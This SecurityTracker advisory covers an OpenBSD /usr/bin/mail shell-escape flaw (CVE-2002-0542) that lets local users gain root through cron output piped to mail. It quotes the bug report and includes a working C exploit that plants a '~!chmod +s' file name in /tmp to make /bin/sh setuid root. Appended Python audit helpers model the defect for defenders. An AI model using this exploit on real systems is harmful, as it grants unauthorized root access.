SecurityTracker.com

SecurityTracker Archives

Category: Application (E-mail Client) > mail (/usr/bin/mail)
Vendors: OpenBSD
OpenBSD '/usr/bin/mail' May Let Local Users Execute Commands With Root Privileges By Specifying a Malicious Crontab Entry
SecurityTracker Alert ID: 1004024
SecurityTracker URL: http://securitytracker.com/id/1004024
CVE Reference: CVE-2002-0542
Updated: Apr 30 2004
Original Entry Date: Apr 11 2002
Impact: Execution of arbitrary code via local system, Root access via local system
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes

Description:   A vulnerability was reported in '/usr/bin/mail' on OpenBSD. A local user that can specify a crontab entry may be able to cause arbitrary shell commands to be executed on the system with root level privileges.

It is reported that /usr/bin/mail honours a special escape sequence placed at the start of a line in the body of an e-mail, even when the body arrives on standard input from a pipe rather than from a terminal. The escape sequence names a shell command to be executed, as described in the mail(1) man page:

~!command

A local user who can get attacker-chosen text, such as a crafted file name, into the output of a root cron job whose output is piped to mail may be able to cause arbitrary commands to be executed with root privileges when the cron job runs.

Demonstration exploit code is provided in the Source Message.

The author of the report credits urbanek@openbsd.cz with discovering the vulnerability.

Impact:   A local user who can influence crontab entries or their output may be able to cause arbitrary shell commands to be executed with root privileges, giving that user root-level access to the system.
Solution:   The vendor has developed a patch, available at:

http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

Vendor URL:  www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
Cause:   Input validation error
Underlying OS:  UNIX (OpenBSD)
Underlying OS Comments:  OpenBSD 3.0-current (and below, before 8 Apr 2002)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Openbsd Issues Fix) OpenBSD '/usr/bin/mail' May Let Local Users Execute Commands With Root Privileges By Specifying a Malicious Crontab Entry
The vendor has released a fix.



 Source Message Contents

Subject:  local root compromise in openbsd 3.0 and below


There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr 2002).

Full problem report and exploit below. FreeBSD is not vulnerable.

----- Forwarded message from urbanek@openbsd.cz -----

From: urbanek@openbsd.cz
To: gnats@openbsd.org
Subject: user/2536: possible root compromise using /usr/bin/mail 

>Number:         2536
>Category:       user
>Synopsis:       crontab entry allows possible arbitrary command execution
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    bugs
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon Apr  8 13:30:02 MDT 2002
>Last-Modified:
>Originator:     Milos Urbanek
>Organization:

>Release:        all releases including CURRENT
>Environment:
	
	System      : OpenBSD 3.0
	Architecture: OpenBSD.i386
	Machine     : i386
>Description:

        program /usr/bin/mail allows a special escape sequence to
        be specified in the body of an email; this escape sequence
        specifies a shell command to be executed

        as mentioned in mail(1):

~!command
             Execute the indicated shell command, then return to the message.


        Problem:
        default root crontab entry looks like:

        # do daily/weekly/monthly maintenance
        # on monday only (techie)
        30      1       *       *       1       /bin/sh /etc/daily 2>&1 | tee /var/log/daily.out | mail -s "`/bin/hostname` daily output" root
        30      3       *       *       6       /bin/sh /etc/weekly 2>&1 | tee /var/log/weekly.out | mail -s "`/bin/hostname` weekly output" root
        30      5       1       *       *       /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root


        If there is something in files /etc/daily, /etc/weekly or /etc/monthly
        which could enable the attacker to insert its own input,
        like a malformed filename

         chiba:5$ touch \~!haha
         chiba:6$ ls -al *haha*
        -rw-r--r--  1 milos  milos  0 Apr  8 19:30 ~!haha

        or by other means like output from log files under /var/log,

        the attacker can execute an arbitrary command running under root
        privileges, which can lead to the root compromise.


>How-To-Repeat:
        read the man page, and see above
[...]

----- End forwarded message -----

Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

Exploit:

/*
 * (c) 2002 venglin@freebsd.lublin.pl
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to urbanek@openbsd.cz for discovering vulnerability.
 *
 */

#include <fcntl.h>
#include <sys/stat.h>	/* mode bits passed to open() */
#include <unistd.h>	/* chdir(), close() */

int main(void)
{
	int fd;

	/*
	 * Create a file in /tmp whose name begins with a newline followed by
	 * a mail(1) "~!" shell escape.  When the daily maintenance job lists
	 * the file and its output is piped to the unpatched mail, the escape
	 * lands at the start of a line and the command runs as root.  The
	 * perl one-liner prints "/bin/sh" as octal escapes.
	 */
	chdir("/tmp");
	fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);

	if (fd >= 0)	/* open() returns -1 on failure, so test for that, not for 0 */
		close(fd);
	return 0;
}

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
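The following Python is an added example; it is not code from SecurityTracker, OpenBSD or either reporter. It models the mail(1) message-collection loop in a simplified way to show why honouring "~" escapes on piped, non-interactive input is the defect described in the advisory and in the forwarded report above, and it adds two audit helpers a defender would want: one lists the crontab jobs whose output is piped into mail, the other flags the lines in captured job output that an escape-honouring mail would have interpreted. The crontab input is the default root crontab quoted in the report (whitespace compacted); the output sample is constructed. The "patched" behaviour, escapes recognised only when input comes from a terminal, is an assumption about what the linked collect.c diff does, not a reading of the diff itself. Nothing in the block executes a command.

```python
"""Simplified model of mail(1) escape handling plus two cron audit helpers.
Added example; not code from SecurityTracker, OpenBSD or the reporters."""
import re

# mail(1)'s default escape character.  The real program lets the user
# change it with the 'escape' option, which this model ignores.
ESCAPE_CHAR = "~"

# Five schedule fields followed by the command (root/system crontab style;
# '@daily'-style shortcuts and VAR=value lines are not handled).
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def collect(lines, interactive):
    """Simplified model of the collect loop.  Returns (body, escapes).

    `escapes` holds (letter, argument) pairs an escape-honouring mail would
    act on; '!' is the shell escape quoted in the advisory, and '~~text'
    yields a literal '~text' line as mail(1) documents.  The unpatched
    OpenBSD mail behaved as if `interactive` were always true, even with
    stdin coming from a pipe.  The fixed behaviour is modelled here as
    'recognise escapes only when reading from a terminal'; that is an
    assumption about the vendor patch, so check the linked collect.c diff
    for the exact condition it adds.
    """
    body, escapes = [], []
    for line in lines:
        if interactive and len(line) > 1 and line[0] == ESCAPE_CHAR:
            if line[1] == ESCAPE_CHAR:
                body.append(line[1:])      # '~~' escapes the escape character
            else:
                escapes.append((line[1], line[2:].strip()))
            continue
        body.append(line)
    return body, escapes


def escape_lines(text, escape=ESCAPE_CHAR):
    """Return (line_number, line) for each line of `text` that begins with
    the escape character: exactly the lines an unpatched mail would have
    interpreted if this text were piped into it as a message body."""
    return [(n, line) for n, line in enumerate(text.splitlines(), 1)
            if line.startswith(escape)]


def jobs_piping_to_mail(crontab_text):
    """Parse a crontab and return (schedule, command) for every job whose
    pipeline ends in mail(1), i.e. whose output becomes a message body."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        schedule, command = " ".join(m.groups()[:5]), m.group(6)
        last_stage = command.rsplit("|", 1)[-1].strip()
        if re.match(r"^(/usr/bin/)?mailx?\b", last_stage):
            hits.append((schedule, command))
    return hits


# Constructed inputs for the demonstration.  The crontab is the default root
# crontab quoted in the bug report (whitespace compacted, one unrelated job
# added); the output sample imitates a listing in which an attacker-created
# file name '~!haha' landed at the start of a line.  Neither is real output.
DEFAULT_ROOT_CRONTAB = """\
# do daily/weekly/monthly maintenance
# on monday only (techie)
30 1 * * 1 /bin/sh /etc/daily 2>&1 | tee /var/log/daily.out | mail -s "`/bin/hostname` daily output" root
30 3 * * 6 /bin/sh /etc/weekly 2>&1 | tee /var/log/weekly.out | mail -s "`/bin/hostname` weekly output" root
30 5 1 * * /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root
0 0 * * * /usr/libexec/locate.updatedb
"""

SAMPLE_CRON_OUTPUT = """\
Removing scratch and junk files:
total 8
-rw-r--r--  1 milos  milos  0 Apr  8 19:30 report.txt
~!haha
Checking subsystem status:
"""

if __name__ == "__main__":
    for schedule, command in jobs_piping_to_mail(DEFAULT_ROOT_CRONTAB):
        print("job output reaches mail:", schedule, "->", command)
    for n, line in escape_lines(SAMPLE_CRON_OUTPUT):
        print("line %d would be treated as an escape: %r" % (n, line))
    _, escapes = collect(SAMPLE_CRON_OUTPUT.splitlines(), interactive=True)
    print("unpatched mail would act on:", escapes)
    _, escapes = collect(SAMPLE_CRON_OUTPUT.splitlines(), interactive=False)
    print("patched mail keeps everything as body text:", escapes == [])
```

Run against a real root crontab, `jobs_piping_to_mail` tells you which jobs hand their output to mail, and `escape_lines` run over the saved job output (the `tee` copies under /var/log in the crontab above) shows whether anything an unpatched mail would have interpreted ever reached it. The contrast between the two `collect` calls is the whole defect: the same body text is harmless when escapes are tied to an interactive terminal session and dangerous when they are honoured on a pipe.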


Copyright 2021, SecurityGlobal.net LLC